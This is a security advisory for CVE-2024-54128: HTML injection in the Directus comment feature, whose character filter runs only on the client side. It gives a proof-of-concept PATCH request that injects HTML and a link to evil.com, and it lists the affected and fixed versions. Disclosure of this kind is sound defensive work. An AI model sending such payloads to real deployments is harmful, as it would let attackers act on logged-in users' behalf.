GHSA-r6wx-627v-gh2f

Advisory Details

### Summary
The Comment feature has implemented a filter to prevent users from adding restricted characters, such as HTML tags. However, this filter operates on the client-side, which can be bypassed, making the application vulnerable to HTML Injection.

### Details
The Comment feature implements a character filter on the client-side, this can be bypassed by directly sending a request to the endpoint.

Example Request:

```
PATCH /activity/comment/3 HTTP/2
Host: directus.local

{
"comment": "<h1>TEST <p style=\"color:red\">HTML INJECTION</p> <a href=\"//evil.com\">Test Link</a></h1>"
}
```

Example Response:

```json
{
"data": {
"id": 3,
"action": "comment",
"user": "288fdccc-399a-40a1-ac63-811bf62e6a18",
"timestamp": "2023-09-06T02:23:40.740Z",
"ip": "10.42.0.1",
"user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
"collection": "directus_files",
"item": "7247dda1-c386-4e7a-8121-7e9c1a42c15a",
"comment": "<h1>TEST <p style=\"color:red\">HTML INJECTION</p> <a href=\"//evil.com\">Test Link</a></h1>",
"origin": "https://directus.local",
"revisions": []
}
}
```

Example Result:

![Screenshot 2023-09-06 094536](https://user-images.githubusercontent.com/61263002/265876100-12e068fe-3d53-41b4-bfcb-458c2bc2a638.png)

## Impact

With the introduction of session cookies this issue has become exploitable as a malicious script is now able to do authenticated actions on the current users behalf.

Affected Packages

npm @directus/app

Affected versions: 11.0.0 (fixed in 13.3.1)

npm directus

Affected versions: 10.10.0 (fixed in 10.13.4)

npm directus

Affected versions: 11.0.0-rc.1 (fixed in 11.2.2)

Related CVEs

CVE-2024-54128

Directus has an HTML Injection in Comment

Advisory Details

Affected Packages

Related CVEs

Key Information

Dataset